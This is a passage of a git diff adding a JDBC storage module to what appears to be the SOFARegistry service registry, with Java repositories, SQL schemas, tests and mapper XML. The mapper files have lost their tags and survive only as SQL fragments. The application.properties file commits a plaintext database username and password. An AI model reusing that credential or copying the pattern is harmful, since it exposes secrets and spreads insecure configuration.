com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.store.api.repository.InterfaceAppsRepository; +import com.alipay.sofa.registry.util.BatchCallableRunnable.InvokeFuture; +import com.alipay.sofa.registry.util.BatchCallableRunnable.TaskEvent; +import com.alipay.sofa.registry.util.MathUtils; +import com.alipay.sofa.registry.util.TimestampUtil; +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.Sets; +import java.util.List; +import java.util.Map; +import java.util.Set; +import java.util.concurrent.ConcurrentHashMap; +import javax.annotation.PostConstruct; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.util.CollectionUtils; + +/** + * @author xiaojian.xj + * @version $Id: InterfaceAppsJdbcRepository.java, v 0.1 2021年01月24日 19:57 xiaojian.xj Exp $ + */ +public class InterfaceAppsJdbcRepository implements InterfaceAppsRepository { + + private static final Logger LOG = LoggerFactory.getLogger("METADATA-EXCHANGE", "[InterfaceApps]"); + + private volatile long maxId = 0L; + + /** map: */ + protected final Map interfaceApps = new ConcurrentHashMap<>(); + + @Autowired private InterfaceAppBatchQueryCallable interfaceAppBatchQueryCallable; + + @Autowired private InterfaceAppsIndexMapper interfaceAppsIndexMapper; + + private int refreshLimit; + + @Autowired private MetadataConfig metadataConfig; + + @Autowired private DefaultCommonConfig defaultCommonConfig; + + @PostConstruct + public void postConstruct() { + refreshLimit = metadataConfig.getInterfaceAppsRefreshLimit(); + } + + @Override + public void loadMetadata() { + // load interface_apps_version when session server startup, + // in order to avoid large request on database after session startup, + // it will load almost all record of this dataCenter, + // but not promise load 100% records of this dataCenter, + // eg: records insert after interfaceAppsIndexMapper.getTotalCount + // and beyond refreshCount will not be load in this method, they will be load in next schedule + final int total = interfaceAppsIndexMapper.getTotalCount(defaultCommonConfig.getClusterId()); + // add 100, query the new mappings which inserted when scanning + final int refreshCount = MathUtils.divideCeil(total, refreshLimit) + 100; + LOG.info( + "begin load metadata, total count mapping {}, rounds={}, dataCenter={}", + total, + refreshCount, + defaultCommonConfig.getClusterId()); + int refreshTotal = 0; + for (int i = 0; i < refreshCount; i++) { + final int num = this.refresh(defaultCommonConfig.getClusterId()); + LOG.info("load metadata in round={}, num={}", i, num); + refreshTotal += num; + if (num == 0) { + break; + } + } + LOG.info("finish load metadata, total={}", refreshTotal); + } + + /** + * get revisions by interfaceName + * + * @param dataInfoId + * @return return appNames + */ + @Override + public InterfaceMapping getAppNames(String dataInfoId) { + InterfaceMapping appNames = interfaceApps.get(dataInfoId); + if (appNames != null) { + return appNames; + } + + TaskEvent task = interfaceAppBatchQueryCallable.new TaskEvent(dataInfoId); + InvokeFuture future = interfaceAppBatchQueryCallable.commit(task); + try { + if (future.isSuccess()) { + Object response = future.getResponse(); + if (response == null) { + appNames = new InterfaceMapping(-1); + } else { + appNames = (InterfaceMapping) response; + } + LOG.info("update interfaceMapping {}, {}", dataInfoId, appNames); + interfaceApps.put(dataInfoId, appNames); + return appNames; + } + LOG.error("query appNames by interface: {} fail.", dataInfoId); + throw new InterfaceAppQueryException(dataInfoId); + + } catch (Throwable e) { + LOG.error("query appNames by interface: {} error.", dataInfoId, e); + throw new RuntimeException( + String.format("query appNames by interface: %s error.", dataInfoId), e); + } + } + + /** + * insert + * + * @param appName + * @param interfaceNames + */ + @Override + public void batchSave(String appName, Set interfaceNames) { + for (String interfaceName : interfaceNames) { + InterfaceAppsIndexDomain interfaceApps = + new InterfaceAppsIndexDomain(defaultCommonConfig.getClusterId(), interfaceName, appName); + int effectRows = interfaceAppsIndexMapper.update(interfaceApps); + if (effectRows == 0) { + interfaceAppsIndexMapper.insertOnReplace(interfaceApps); + } + } + } + + /** refresh interfaceNames index */ + private synchronized void triggerRefreshCache(InterfaceAppsIndexDomain domain) { + InterfaceMapping mapping = interfaceApps.get(domain.getInterfaceName()); + final long nanosLong = TimestampUtil.getNanosLong(domain.getGmtCreate()); + if (mapping == null) { + if (domain.isReference()) { + mapping = new InterfaceMapping(nanosLong, domain.getAppName()); + } else { + mapping = new InterfaceMapping(nanosLong); + } + if (LOG.isInfoEnabled()) { + LOG.info( + "refresh interface: {}, ref: {}, app: {}, mapping: {}", + domain.getInterfaceName(), + domain.isReference(), + domain.getAppName(), + mapping); + } + interfaceApps.put(domain.getInterfaceName(), mapping); + return; + } + if (nanosLong > mapping.getNanosVersion()) { + InterfaceMapping newMapping = null; + if (domain.isReference()) { + newMapping = new InterfaceMapping(nanosLong, mapping.getApps(), domain.getAppName()); + } else { + Set prev = Sets.newHashSet(mapping.getApps()); + prev.remove(domain.getAppName()); + newMapping = new InterfaceMapping(nanosLong, prev, domain.getAppName()); + } + if (LOG.isInfoEnabled()) { + LOG.info( + "update interface mapping: {}, ref: {}, app: {}, newMapping: {}, oldMapping: {}", + domain.getInterfaceName(), + domain.isReference(), + domain.getAppName(), + newMapping, + mapping); + } + interfaceApps.put(domain.getInterfaceName(), newMapping); + } else { + LOG.error( + "[IgnoreUpdateCache]ignored refresh index, interfac={}, newVersion={} , current mapping={}", + domain.getInterfaceName(), + nanosLong, + mapping); + } + } + + public synchronized int refresh(String dataCenter) { + final long last = maxId; + List afters = + interfaceAppsIndexMapper.queryLargeThan(dataCenter, last, refreshLimit); + + if (LOG.isInfoEnabled()) { + LOG.info("refresh madId={}, afters={},", last, afters.size()); + } + + if (CollectionUtils.isEmpty(afters)) { + return 0; + } + + // trigger refresh interface index, must be sorted by id + for (InterfaceAppsIndexDomain interfaceApps : afters) { + triggerRefreshCache(interfaceApps); + } + + // update madId + InterfaceAppsIndexDomain max = afters.get(afters.size() - 1); + if (maxId < max.getId()) { + this.maxId = max.getId(); + LOG.info("update maxId {} to {}", last, maxId); + } else { + LOG.info("skip update maxId {}, got={}", maxId, max.getId()); + } + return afters.size(); + } + + @VisibleForTesting + public Map getInterfaceApps() { + return interfaceApps; + } +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/repository/impl/ProvideDataJdbcRepository.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/repository/impl/ProvideDataJdbcRepository.java new file mode 100644 index 000000000..c92b1494a --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/repository/impl/ProvideDataJdbcRepository.java @@ -0,0 +1,128 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.repository.impl; + +import com.alipay.sofa.registry.common.model.console.PersistenceData; +import com.alipay.sofa.registry.common.model.console.PersistenceDataBuilder; +import com.alipay.sofa.registry.jdbc.config.DefaultCommonConfig; +import com.alipay.sofa.registry.jdbc.convertor.ProvideDataDomainConvertor; +import com.alipay.sofa.registry.jdbc.domain.ProvideDataDomain; +import com.alipay.sofa.registry.jdbc.mapper.ProvideDataMapper; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.store.api.meta.ProvideDataRepository; +import com.alipay.sofa.registry.util.MathUtils; +import java.util.ArrayList; +import java.util.Collection; +import java.util.List; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author xiaojian.xj + * @version $Id: ProvideDataJdbcRepository.java, v 0.1 2021年03月13日 19:20 xiaojian.xj Exp $ + */ +public class ProvideDataJdbcRepository implements ProvideDataRepository { + + private static final Logger LOG = LoggerFactory.getLogger("META-PROVIDEDATA", "[ProvideData]"); + + @Autowired private ProvideDataMapper provideDataMapper; + + @Autowired private DefaultCommonConfig defaultCommonConfig; + + private static final Integer batchQuerySize = 1000; + + @Override + public boolean put(PersistenceData persistenceData, long expectVersion) { + + ProvideDataDomain exist = + provideDataMapper.query( + defaultCommonConfig.getClusterId(), + PersistenceDataBuilder.getDataInfoId(persistenceData)); + + ProvideDataDomain domain = + ProvideDataDomainConvertor.convert2ProvideData( + persistenceData, defaultCommonConfig.getClusterId()); + int affect; + try { + if (exist == null) { + affect = provideDataMapper.save(domain); + if (LOG.isInfoEnabled()) { + LOG.info("save provideData: {}, affect rows: {}", persistenceData, affect); + } + } else { + affect = provideDataMapper.update(domain, expectVersion); + if (LOG.isInfoEnabled()) { + LOG.info( + "update provideData: {}, expectVersion: {}, affect rows: {}", + domain, + expectVersion, + affect); + } + } + + if (affect == 0) { + PersistenceData query = get(domain.getDataKey()); + LOG.error( + "put provideData fail, query: {}, update: {}, expectVersion: {}", + query, + domain, + expectVersion); + } + + } catch (Throwable t) { + LOG.error("put provideData: {} error.", domain, t); + return false; + } + + return affect > 0; + } + + @Override + public PersistenceData get(String key) { + return ProvideDataDomainConvertor.convert2PersistenceData( + provideDataMapper.query(defaultCommonConfig.getClusterId(), key)); + } + + @Override + public boolean remove(String key, long version) { + int affect = provideDataMapper.remove(defaultCommonConfig.getClusterId(), key, version); + if (LOG.isInfoEnabled()) { + LOG.info( + "remove provideData, dataCenter: {}, key: {}, version: {}, affect rows: {}", + defaultCommonConfig.getClusterId(), + key, + version, + affect); + } + return affect > 0; + } + + @Override + public Collection getAll() { + + Collection responses = new ArrayList<>(); + int total = provideDataMapper.selectTotalCount(defaultCommonConfig.getClusterId()); + int round = MathUtils.divideCeil(total, batchQuerySize); + for (int i = 0; i < round; i++) { + int start = i * batchQuerySize; + List provideDataDomains = + provideDataMapper.queryByPage(defaultCommonConfig.getClusterId(), start, batchQuerySize); + responses.addAll(ProvideDataDomainConvertor.convert2PersistenceDatas(provideDataDomains)); + } + return responses; + } +} diff --git a/server/store/jdbc/src/main/resources/application.properties b/server/store/jdbc/src/main/resources/application.properties new file mode 100644 index 000000000..1ac2cbd8c --- /dev/null +++ b/server/store/jdbc/src/main/resources/application.properties @@ -0,0 +1,31 @@ +# +# Licensed to the Apache Software Foundation (ASF) under one or more +# contributor license agreements. See the NOTICE file distributed with +# this work for additional information regarding copyright ownership. +# The ASF licenses this file to You under the Apache License, Version 2.0 +# (the "License"); you may not use this file except in compliance with +# the License. You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +## connect db +persistence.profile.active=jdbc +jdbc.driverClassName = com.mysql.jdbc.Driver +jdbc.url = jdbc:mysql://127.0.0.1:2883/metadatadb?useUnicode=true&characterEncoding=utf8 +jdbc.username = obvip_infra_dev_1:infra_public_dev0_2769:metadatadb +jdbc.password = 7Yh4Csc4 + +#jdbc.typeAliasesPackage=com.alipay.sofa.registry.jdbc.domain +jdbc.mapperLocations=classpath:mapper/*.xml + +meta.server.elector.lockExpireDuration=20000 +meta.server.revisionGcSilenceHour=24 + + diff --git a/server/store/jdbc/src/main/resources/h2-mapper/app_revision.xml b/server/store/jdbc/src/main/resources/h2-mapper/app_revision.xml new file mode 100644 index 000000000..f492fe373 --- /dev/null +++ b/server/store/jdbc/src/main/resources/h2-mapper/app_revision.xml @@ -0,0 +1,105 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + update app_revision set gmt_modified = CURRENT_TIMESTAMP + where data_center=#{dataCenter} + + and revision in + + #{item} + + + + + + + + + + + delete from app_revision where data_center = #{dataCenter} and revision = #{revision} + + + \ No newline at end of file diff --git a/server/store/jdbc/src/main/resources/h2-mapper/distribute_lock.xml b/server/store/jdbc/src/main/resources/h2-mapper/distribute_lock.xml new file mode 100644 index 000000000..302e0f8aa --- /dev/null +++ b/server/store/jdbc/src/main/resources/h2-mapper/distribute_lock.xml @@ -0,0 +1,85 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/server/store/jdbc/src/main/resources/h2-mapper/interface_apps_index.xml b/server/store/jdbc/src/main/resources/h2-mapper/interface_apps_index.xml new file mode 100644 index 000000000..53080afb9 --- /dev/null +++ b/server/store/jdbc/src/main/resources/h2-mapper/interface_apps_index.xml @@ -0,0 +1,63 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/server/store/jdbc/src/main/resources/h2-mapper/provide_data.xml b/server/store/jdbc/src/main/resources/h2-mapper/provide_data.xml new file mode 100644 index 000000000..c85ff7d4d --- /dev/null +++ b/server/store/jdbc/src/main/resources/h2-mapper/provide_data.xml @@ -0,0 +1,84 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + delete from provide_data where data_center = #{dataCenter} and data_key = #{dataKey} + and data_version = #{dataVersion} + + + + + + + \ No newline at end of file diff --git a/server/store/jdbc/src/main/resources/mapper/app_revision.xml b/server/store/jdbc/src/main/resources/mapper/app_revision.xml new file mode 100644 index 000000000..f492fe373 --- /dev/null +++ b/server/store/jdbc/src/main/resources/mapper/app_revision.xml @@ -0,0 +1,105 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + update app_revision set gmt_modified = CURRENT_TIMESTAMP + where data_center=#{dataCenter} + + and revision in + + #{item} + + + + + + + + + + + delete from app_revision where data_center = #{dataCenter} and revision = #{revision} + + + \ No newline at end of file diff --git a/server/store/jdbc/src/main/resources/mapper/distribute_lock.xml b/server/store/jdbc/src/main/resources/mapper/distribute_lock.xml new file mode 100644 index 000000000..302e0f8aa --- /dev/null +++ b/server/store/jdbc/src/main/resources/mapper/distribute_lock.xml @@ -0,0 +1,85 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/server/store/jdbc/src/main/resources/mapper/interface_apps_index.xml b/server/store/jdbc/src/main/resources/mapper/interface_apps_index.xml new file mode 100644 index 000000000..172b2c29f --- /dev/null +++ b/server/store/jdbc/src/main/resources/mapper/interface_apps_index.xml @@ -0,0 +1,60 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/server/store/jdbc/src/main/resources/mapper/provide_data.xml b/server/store/jdbc/src/main/resources/mapper/provide_data.xml new file mode 100644 index 000000000..c85ff7d4d --- /dev/null +++ b/server/store/jdbc/src/main/resources/mapper/provide_data.xml @@ -0,0 +1,84 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + delete from provide_data where data_center = #{dataCenter} and data_key = #{dataKey} + and data_version = #{dataVersion} + + + + + + + \ No newline at end of file diff --git a/server/store/jdbc/src/main/resources/sql/h2/base_info.sql b/server/store/jdbc/src/main/resources/sql/h2/base_info.sql new file mode 100644 index 000000000..e69de29bb diff --git a/server/store/jdbc/src/main/resources/sql/h2/create_table.sql b/server/store/jdbc/src/main/resources/sql/h2/create_table.sql new file mode 100644 index 000000000..b14ab6c7a --- /dev/null +++ b/server/store/jdbc/src/main/resources/sql/h2/create_table.sql @@ -0,0 +1,64 @@ +drop table if exists APP_REVISION; +create table APP_REVISION ( + id bigint unsigned not null auto_increment primary key, + data_center varchar(129) not null, + revision varchar(128) not null, + app_name varchar(128) not null, + base_params text default null, + service_params text default null, + gmt_create timestamp not null, + gmt_modified timestamp not null, + client_version varchar(512) default null, + UNIQUE KEY `uk_data_center_revision` (`data_center`, `revision`) +); + +drop table if exists interface_apps_index; +CREATE TABLE interface_apps_index ( + id bigint(20) NOT NULL AUTO_INCREMENT, + data_center varchar(128) NOT NULL, + app_name varchar(128) NOT NULL COMMENT '应用名', + interface_name varchar(386) NOT NULL COMMENT '接口名', + gmt_create timestamp(6) NOT NULL COMMENT '创建时间', + gmt_modified timestamp(6) NOT NULL COMMENT '修改时间', + hashcode varchar(128) NOT NULL COMMENT '唯一索引hashcode', + reference tinyint(4) NOT NULL COMMENT '是否被引用', + PRIMARY KEY(id), + UNIQUE KEY `uk_hashcode` (`data_center`, `app_name`, `hashcode`), + KEY `idx_data_center_interface` (`interface_name`) +); + +drop table if exists distribute_lock; +CREATE TABLE distribute_lock ( + id bigint(20) NOT NULL AUTO_INCREMENT primary key, + data_center varchar(128) NOT NULL, + lock_name varchar(1024) NOT NULL, + owner varchar(512) NOT NULL, + duration bigint(20) NOT NULL, + gmt_create timestamp(3) NOT NULL DEFAULT CURRENT_TIMESTAMP, + gmt_modified timestamp(3) NOT NULL DEFAULT CURRENT_TIMESTAMP, + UNIQUE KEY `uk_data_center_lock` (`data_center`, `lock_name`), + KEY `idx_lock_owner` (`owner`) +); + +drop table if exists provide_data; +CREATE TABLE provide_data ( + id bigint(20) NOT NULL AUTO_INCREMENT primary key, + data_center varchar(128) NOT NULL, + data_key varchar(1024) NOT NULL, + data_value mediumtext DEFAULT NULL , + gmt_create timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP, + gmt_modified timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, + `data_version` bigint(20) NOT NULL DEFAULT '0' COMMENT '版本号', + UNIQUE KEY `uk_data_center_key` (`data_center`, `data_key`) +); + + + + + + + + + + + diff --git a/server/store/jdbc/src/main/resources/sql/mysql/create_table.sql b/server/store/jdbc/src/main/resources/sql/mysql/create_table.sql new file mode 100644 index 000000000..b6147a14f --- /dev/null +++ b/server/store/jdbc/src/main/resources/sql/mysql/create_table.sql @@ -0,0 +1,68 @@ +CREATE TABLE `app_revision` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT '主键', + `data_center` varchar(128) NOT NULL COMMENT '集群名', + `revision` varchar(128) NOT NULL COMMENT 'revision', + `app_name` varchar(128) NOT NULL COMMENT '应用名', + `base_params` text DEFAULT NULL COMMENT '基础参数', + `service_params` text DEFAULT NULL COMMENT '服务参数', + `gmt_create` timestamp NOT NULL COMMENT '创建时间', + `gmt_modified` timestamp NOT NULL COMMENT '修改时间', + `client_version` varchar(512) DEFAULT NULL COMMENT '客户端版本', + PRIMARY KEY (`id`), + UNIQUE KEY `uk_data_center_revision` (`data_center`, `revision`) BLOCK_SIZE 16384 GLOBAL +) AUTO_INCREMENT = 913172 DEFAULT CHARSET = utf8mb4 ROW_FORMAT = DYNAMIC COMPRESSION = 'zstd_1.0' REPLICA_NUM = 3 BLOCK_SIZE = 16384 USE_BLOOM_FILTER = FALSE TABLET_SIZE = 134217728 PCTFREE = 10 COMMENT = '服务元数据表' + +CREATE TABLE `interface_apps_index` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT '主键', + `data_center` varchar(128) NOT NULL COMMENT '集群名称', + `app_name` varchar(128) NOT NULL COMMENT '应用名', + `interface_name` varchar(386) NOT NULL COMMENT '接口名', + `gmt_create` timestamp(6) NOT NULL COMMENT '创建时间', + `gmt_modified` timestamp(6) NOT NULL COMMENT '修改时间', + `hashcode` varchar(128) NOT NULL COMMENT '唯一索引hashcode', + `reference` tinyint(4) NOT NULL COMMENT '是否被引用', + PRIMARY KEY (`id`), + UNIQUE KEY `uk_hashcode` (`data_center`, `app_name`, `hashcode`) BLOCK_SIZE 16384 GLOBAL, + KEY `idx_data_center_interface` (`interface_name`) BLOCK_SIZE 16384 GLOBAL +) AUTO_INCREMENT = 1469202 DEFAULT CHARSET = utf8mb4 ROW_FORMAT = DYNAMIC COMPRESSION = 'zstd_1.0' REPLICA_NUM = 3 BLOCK_SIZE = 16384 USE_BLOOM_FILTER = FALSE TABLET_SIZE = 134217728 PCTFREE = 10 COMMENT = 'interface与revision索引表' + +CREATE TABLE `provide_data` ( + `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT COMMENT '主键', + `data_center` varchar(128) NOT NULL COMMENT '集群名', + `data_key` varchar(1024) NOT NULL COMMENT 'data key', + `data_value` mediumtext DEFAULT NULL COMMENT 'data value', + `gmt_create` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP COMMENT '创建时间', + `gmt_modified` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP COMMENT '修改时间', + `data_version` bigint(20) unsigned NOT NULL DEFAULT '0' COMMENT '版本号', + PRIMARY KEY (`id`), + UNIQUE KEY `uk_data_center_key` (`data_center`(128), `data_key`(1024)) BLOCK_SIZE 16384 GLOBAL +) AUTO_INCREMENT = 1 DEFAULT CHARSET = utf8mb4 ROW_FORMAT = DYNAMIC COMPRESSION = 'zstd_1.0' REPLICA_NUM = 3 BLOCK_SIZE = 16384 USE_BLOOM_FILTER = FALSE TABLET_SIZE = 134217728 PCTFREE = 10 COMMENT = '注册中心配置存储表' + +CREATE TABLE `distribute_lock` ( + `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT COMMENT '主键', + `data_center` varchar(128) NOT NULL COMMENT '集群名', + `lock_name` varchar(1024) NOT NULL COMMENT '分布式锁名称', + `owner` varchar(512) NOT NULL COMMENT '锁拥有者', + `duration` bigint(20) NOT NULL COMMENT '持续周期', + `gmt_create` timestamp(3) NOT NULL DEFAULT CURRENT_TIMESTAMP(3) COMMENT '创建时间', + `gmt_modified` timestamp(3) NOT NULL DEFAULT CURRENT_TIMESTAMP(3) ON UPDATE CURRENT_TIMESTAMP(3) COMMENT '修改时间', + PRIMARY KEY (`id`), + UNIQUE KEY `uk_data_center_lock` (`data_center`(128), `lock_name`(1024)) BLOCK_SIZE 16384 GLOBAL, + KEY `idx_lock_owner` (`owner`(512)) BLOCK_SIZE 16384 GLOBAL +) AUTO_INCREMENT = 1 DEFAULT CHARSET = utf8mb4 ROW_FORMAT = DYNAMIC COMPRESSION = 'zstd_1.0' REPLICA_NUM = 3 BLOCK_SIZE = 16384 USE_BLOOM_FILTER = FALSE TABLET_SIZE = 134217728 PCTFREE = 10 COMMENT = '分布式锁' + + + + + + + + + + + + + + + + diff --git a/server/store/jdbc/src/test/java/com/alipay/sofa/registry/jdbc/AbstractH2DbTestBase.java b/server/store/jdbc/src/test/java/com/alipay/sofa/registry/jdbc/AbstractH2DbTestBase.java new file mode 100644 index 000000000..00a677e9b --- /dev/null +++ b/server/store/jdbc/src/test/java/com/alipay/sofa/registry/jdbc/AbstractH2DbTestBase.java @@ -0,0 +1,129 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc; + +import com.alipay.sofa.registry.util.FileUtils; +import java.io.File; +import java.io.IOException; +import java.sql.Connection; +import java.sql.PreparedStatement; +import java.sql.SQLException; +import java.util.Arrays; +import javax.sql.DataSource; +import org.apache.commons.lang.StringUtils; +import org.apache.logging.log4j.util.Strings; +import org.h2.tools.Server; +import org.junit.Before; +import org.junit.runner.RunWith; +import org.springframework.beans.BeansException; +import org.springframework.boot.autoconfigure.SpringBootApplication; +import org.springframework.boot.test.context.SpringBootTest; +import org.springframework.context.ApplicationContext; +import org.springframework.context.ApplicationContextAware; +import org.springframework.test.context.ActiveProfiles; +import org.springframework.test.context.junit4.SpringJUnit4ClassRunner; + +/** + * @author chen.zhu + *

Mar 15, 2021 + */ +@ActiveProfiles("test") +@SpringBootTest(classes = AbstractH2DbTestBase.JdbcTestConfig.class) +@RunWith(SpringJUnit4ClassRunner.class) +public class AbstractH2DbTestBase extends AbstractTest implements ApplicationContextAware { + + public static final String TABLE_STRUCTURE = "sql/h2/create_table.sql"; + public static final String TABLE_DATA = "sql/h2/base_info.sql"; + + protected final String KEY_H2_PORT = "h2Port"; + private Server h2Server; + + protected DataSource dataSource; + + protected ApplicationContext applicationContext; + + @Before + public void setUpTestDataSource() throws SQLException, IOException { + executeSqlScript(prepareDatas()); + } + + protected void startH2Server() throws SQLException { + + int h2Port = Integer.parseInt(System.getProperty(KEY_H2_PORT, "9123")); + h2Server = Server.createTcpServer("-tcpPort", String.valueOf(h2Port), "-tcpAllowOthers"); + h2Server.start(); + // new Console().runTool(); + } + + protected String prepareDatas() { + return ""; + } + + protected String prepareDatasFromFile(String path) throws IOException { + return readFileAsString(path); + } + + public static String readFileAsString(String fileName) { + try { + return Arrays.toString(FileUtils.readFileToByteArray(new File(fileName))); + } catch (Throwable th) { + return ""; + } + } + + protected void executeSqlScript(String prepareSql) throws SQLException { + if (StringUtils.isEmpty(prepareSql)) { + return; + } + Connection conn = null; + PreparedStatement stmt = null; + try { + conn = dataSource.getConnection(); + conn.setAutoCommit(false); + if (!Strings.isEmpty(prepareSql)) { + for (String sql : prepareSql.split(";")) { + logger.debug("[setup][data]{}", sql.trim()); + stmt = conn.prepareStatement(sql); + stmt.executeUpdate(); + } + } + conn.commit(); + + } catch (Exception ex) { + logger.error("[SetUpTestDataSource][fail]:", ex); + if (null != conn) { + conn.rollback(); + } + } finally { + if (null != stmt) { + stmt.close(); + } + if (null != conn) { + conn.setAutoCommit(true); + conn.close(); + } + } + } + + @Override + public void setApplicationContext(ApplicationContext applicationContext) throws BeansException { + this.applicationContext = applicationContext; + } + + @SpringBootApplication + public static class JdbcTestConfig {} +} diff --git a/server/store/jdbc/src/test/java/com/alipay/sofa/registry/jdbc/AbstractTest.java b/server/store/jdbc/src/test/java/com/alipay/sofa/registry/jdbc/AbstractTest.java new file mode 100644 index 000000000..ef3c92329 --- /dev/null +++ b/server/store/jdbc/src/test/java/com/alipay/sofa/registry/jdbc/AbstractTest.java @@ -0,0 +1,292 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc; + +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.observer.Observable; +import com.alipay.sofa.registry.observer.UnblockingObserver; +import com.alipay.sofa.registry.util.NamedThreadFactory; +import io.netty.util.ResourceLeakDetector; +import java.io.IOException; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationTargetException; +import java.lang.reflect.Modifier; +import java.net.InetSocketAddress; +import java.net.ServerSocket; +import java.util.Collections; +import java.util.Map; +import java.util.Random; +import java.util.Set; +import java.util.concurrent.CountDownLatch; +import java.util.concurrent.CyclicBarrier; +import java.util.concurrent.Executor; +import java.util.concurrent.ExecutorService; +import java.util.concurrent.Executors; +import java.util.concurrent.ScheduledExecutorService; +import java.util.concurrent.TimeoutException; +import java.util.concurrent.atomic.AtomicInteger; +import java.util.function.BooleanSupplier; +import org.junit.After; +import org.junit.Before; +import org.junit.BeforeClass; +import org.junit.Rule; +import org.junit.rules.TestName; + +/** + * @author chen.zhu + *

Mar 15, 2021 + */ +public class AbstractTest { + + protected final Logger logger = LoggerFactory.getLogger(getClass()); + + protected ExecutorService executors; + + protected ScheduledExecutorService scheduled; + + @Rule public TestName name = new TestName(); + + public static final Random random = new Random(); + + @BeforeClass + public static void beforeAbstractTestClass() { + System.setProperty("spring.main.show_banner", "false"); + } + + @Before + public void beforeAbstractTest() throws Exception { + + ResourceLeakDetector.setLevel(ResourceLeakDetector.Level.PARANOID); + Thread.interrupted(); // clear interrupt + + executors = Executors.newCachedThreadPool(new NamedThreadFactory(name.getMethodName())); + scheduled = + Executors.newScheduledThreadPool( + Runtime.getRuntime().availableProcessors(), + new NamedThreadFactory("sched-" + name.getMethodName())); + if (logger.isInfoEnabled()) { + logger.info(remarkableMessage("[begin test][{}]"), name.getMethodName()); + } + } + + @After + public void afterAbstractTest() + throws IOException, NoSuchMethodException, InvocationTargetException, IllegalAccessException { + executors.shutdownNow(); + scheduled.shutdownNow(); + + logger.info(remarkableMessage("[end test][{}]"), name.getMethodName()); + } + + protected static void setEnv(Map newenv) throws Exception { + try { + Class processEnvironmentClass = Class.forName("java.lang.ProcessEnvironment"); + Field theEnvironmentField = processEnvironmentClass.getDeclaredField("theEnvironment"); + theEnvironmentField.setAccessible(true); + Map env = (Map) theEnvironmentField.get(null); + env.putAll(newenv); + Field theCaseInsensitiveEnvironmentField = + processEnvironmentClass.getDeclaredField("theCaseInsensitiveEnvironment"); + theCaseInsensitiveEnvironmentField.setAccessible(true); + Map cienv = + (Map) theCaseInsensitiveEnvironmentField.get(null); + cienv.putAll(newenv); + } catch (NoSuchFieldException e) { + Class[] classes = Collections.class.getDeclaredClasses(); + Map env = System.getenv(); + for (Class cl : classes) { + if ("java.util.Collections$UnmodifiableMap".equals(cl.getName())) { + Field field = cl.getDeclaredField("m"); + field.setAccessible(true); + Object obj = field.get(env); + Map map = (Map) obj; + map.clear(); + map.putAll(newenv); + } + } + } + } + + public static void setFinalStatic(Field field, Object newValue) throws Exception { + field.setAccessible(true); + + Field modifiersField = Field.class.getDeclaredField("modifiers"); + modifiersField.setAccessible(true); + modifiersField.setInt(field, field.getModifiers() & ~Modifier.FINAL); + + field.set(null, newValue); + } + + 